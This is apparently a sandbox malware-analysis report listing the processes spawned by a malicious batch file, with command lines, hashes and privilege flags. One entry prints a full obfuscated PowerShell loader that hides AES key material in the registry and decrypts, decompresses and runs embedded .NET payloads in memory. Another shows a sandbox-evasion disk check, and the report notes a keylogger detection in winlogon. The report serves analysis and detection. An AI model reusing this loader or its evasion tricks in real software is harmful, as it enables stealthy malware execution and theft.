Imagebase: 0x7ff662840000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 05:25:34
Start date: 13/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7e2000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 5
Start time: 05:25:39
Start date: 13/03/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
Imagebase: 0x7ff7785e0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 05:25:41
Start date: 13/03/2025
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
Imagebase: 0x7ff7edb50000
File size: 36'352 bytes
MD5 hash: 804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 7
Start time: 05:25:46
Start date: 13/03/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
                                                                                                      Commandline:cmd.exe /c echo function cuoF($vrVB){ Invoke-Expression -Verbose -Debug '$TaCK=35[S35ys35te35m35.S35e35cu35r35i35t35y35.35C35ry35pt35o35g35r35ap35hy35.35A35e35s35]:35:35C35r35e35a35te35(35);'.Replace('35', ''); Invoke-Expression -InformationAction Ignore '$TaCK.3sMo3sde3s=[3sS3sys3st3sem3s.3sS3se3sc3su3sr3sit3sy.3sC3sr3sy3spt3sog3sr3sa3sp3sh3sy.3sC3si3sp3sh3se3srM3so3sde3s]3s:3s:3sC3sBC3s;'.Replace('3s', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$TaCK.sRPasRddsRinsRgsR=[sRSsRyssRtsResRmsR.sRSsResRcusRrisRtsRysR.sRCrsRypsRtsRosRgsRrsRapsRhsRysR.sRPsRasRddsRisRngsRMsRosRdsResR]:sR:sRPsRKsRCsRSsR7;'.Replace('sR', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore '$TaCK.6iKe6iy=6i[S6iy6ist6ie6im.6iC6io6in6iv6ie6ir6it]6i::6iF6ir6io6imB6ias6ie6i66i46iS6itr6ii6in6ig6i("6ieX6iAI6iQp6iH6iXC6iI6iSA6iu6ir6iB6ic6iL6i+6icB6i4j6i66iW6il6i4f6irm6ib6i76i/6i66ihB6ig6ir6iJ6iH6i26icK6iI6i=");'.Replace('6i', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$TaCK.pJIVpJ=[pJSypJspJtepJmpJ.CpJopJnpJvpJepJrpJtpJ]:pJ:FpJrpJopJmpJBapJsepJ6pJ4pJSpJtpJripJnpJgpJ("pJLypJW7pJocpJepJGopJ3pJ6XpJZpJlpJqpJrpJEpJEpJ5xpJlQpJ=pJ=");'.Replace('pJ', ''); $HzNF=$TaCK.CreateDecryptor(); $gTTC=$HzNF.TransformFinalBlock($vrVB, 0, $vrVB.Length); $HzNF.Dispose(); $TaCK.Dispose(); $gTTC;}function ppFM($vrVB){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug '$BYbD=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw(,$vrVB);'.Replace('uw', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$aohN=uwNeuww-uwObuwjuwecuwtuw Suwyuwsuwtuweuwmuw.uwIOuw.MuweuwmuwouwryuwStuwruweuwauwmuw;'.Replace('uw', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$rQYH=QuNeQuw-QuObQujQuecQutQu 
SQuyQusQutQueQumQu.QuIOQu.CQuoQumQupQureQussQuiQuoQunQu.QuGZQuiQupQuSQutQurQueaQum($BYbD, Qu[IQuO.QuCoQumQuprQueQussQuiQuoQunQu.QuCQuoQumpQureQusQusQuiQuonQuMoQudQueQu]Qu:Qu:DQueQucQuoQumQupQureQusQus);'.Replace('Qu', ''); $rQYH.CopyTo($aohN); $rQYH.Dispose(); $BYbD.Dispose(); $aohN.Dispose(); $aohN.ToArray();}function QIGO($vrVB,$BCHx){ Invoke-Expression -Verbose -WarningAction Inquire '$lHpd=oR[SoRysoRteoRmoR.RoReoRfloReoRcoRtoRioRooRnoR.AoRssoReoRmoRboRlyoR]:oR:oRLoRooRaoRd([byte[]]$vrVB);'.Replace('oR', ''); Invoke-Expression -Debug -WarningAction Inquire '$AEjb=$lHpd.OBEnOBtrOByPOBoOBinOBt;'.Replace('OB', ''); Invoke-Expression -Debug '$AEjbR9.IR9nvR9okR9eR9($R9nR9ulR9lR9, $BCHx);'.Replace('R9', '');}function ZAB($lYat){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'vcKCVWMMyKQFoeskiSq;mNFaDYQRq;OvWrknEdQ'; Set-ItemProperty -Path $registryPath -Name 'vcKCVWMMyKQFoeskiSq' -Value $lYat; Set-ItemProperty -Path $registryPath -Name 'mNFaDYQRq' -Value 'eXAIQpHXCISAurBcL+cB4j6Wl4frmb7/6hBgrJH2cKI='; Set-ItemProperty -Path $registryPath -Name 'OvWrknEdQ' -Value 'LyW7oceGo36XZlqrEE5xlQ==';}$sjrS = 'C:\Users\user\Desktop\uy2g7z.bat';$host.UI.RawUI.WindowTitle = $sjrS;$ZyQM=[System.IO.File]::ReadAllText($sjrS).Split([Environment]::NewLine);foreach ($mcTi in $ZyQM) { if ($mcTi.StartsWith('tPpko')) { $eEXA=$mcTi.Substring(5); break; }}ZAB $eEXA;$lYat=[string[]]$eEXA.Split('\');Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$FAf = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[0].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$thN = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[1].Replace("#", 
"/").Replace("@", "A"))));'.Replace('7h', '');Invoke-Expression -Verbose '$RKq = ppFM (cuoF (7h[C7hon7hve7hr7ht]7h:7h:F7hr7ho7hm7hB7ha7hs7he67h4S7ht7hr7hi7hng7h($lYat[2].Replace("#", "/").Replace("@", "A"))));'.Replace('7h', '');QIGO $FAf $null;QIGO $thN $null;QIGO $RKq (,[string[]] ('wjzJMHoFZaIaceAGUG'));
Imagebase: 0x7ff662840000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 05:25:47
Start date: 13/03/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -WindowStyle Hidden -NoProfile
Imagebase: 0x7ff7785e0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 05:25:47
Start date: 13/03/2025
Path: C:\Windows\System32\more.com
Wow64 process (32bit): false
Commandline: more
Imagebase: 0x7ff64e4a0000
File size: 29'696 bytes
MD5 hash: EDB3046610020EE614B5B81B0439895E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 13
Start time: 05:25:56
Start date: 13/03/2025
Path: C:\Windows\System32\winlogon.exe
Wow64 process (32bit): false
Commandline: winlogon.exe
Imagebase: 0x7ff7c8ec0000
File size: 906'240 bytes
MD5 hash: F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.1571702521.0000022FD098A000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: false

Target ID: 14
Start time: 05:25:57
Start date: 13/03/2025
                                                                                                      Path:C:\Windows\System32\lsass.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\lsass.exe
                                                                                                      Imagebase:0x7ff7fa000000
                                                                                                      File size:59'456 bytes
                                                                                                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:15
                                                                                                      Start time:05:25:58
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:16
                                                                                                      Start time:05:25:59
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\dwm.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"dwm.exe"
                                                                                                      Imagebase:0x7ff6c8bd0000
                                                                                                      File size:94'720 bytes
                                                                                                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:17
                                                                                                      Start time:05:26:01
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:18
                                                                                                      Start time:05:26:02
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:19
                                                                                                      Start time:05:26:02
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:20
                                                                                                      Start time:05:26:02
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:21
                                                                                                      Start time:05:26:02
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:22
                                                                                                      Start time:05:26:03
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:23
                                                                                                      Start time:05:26:04
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:24
                                                                                                      Start time:05:26:05
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:25
                                                                                                      Start time:05:26:06
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:26
                                                                                                      Start time:05:26:06
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:27
                                                                                                      Start time:05:26:06
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:28
                                                                                                      Start time:05:26:07
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:29
                                                                                                      Start time:05:26:08
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                      Imagebase:0x7ff65bd60000
                                                                                                      File size:55'320 bytes
                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:30
                                                                                                      Start time:05:26:08
                                                                                                      Start date:13/03/2025
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:31
Start time:05:26:08
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:05:26:09
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:33
Start time:05:26:09
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:34
Start time:05:26:09
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:05:26:09
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:05:26:10
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:05:26:11
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:38
Start time:05:26:11
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:39
Start time:05:26:11
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:40
Start time:05:26:12
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:05:26:12
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:42
Start time:05:26:13
Start date:13/03/2025
Path:C:\Windows\System32\spoolsv.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\spoolsv.exe
Imagebase:0x7ff63fd10000
File size:842'752 bytes
MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:43
Start time:05:26:14
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:44
Start time:05:26:14
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:45
Start time:05:26:14
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:46
Start time:05:26:15
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:47
Start time:05:26:15
Start date:13/03/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
Imagebase:0x7ff65bd60000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false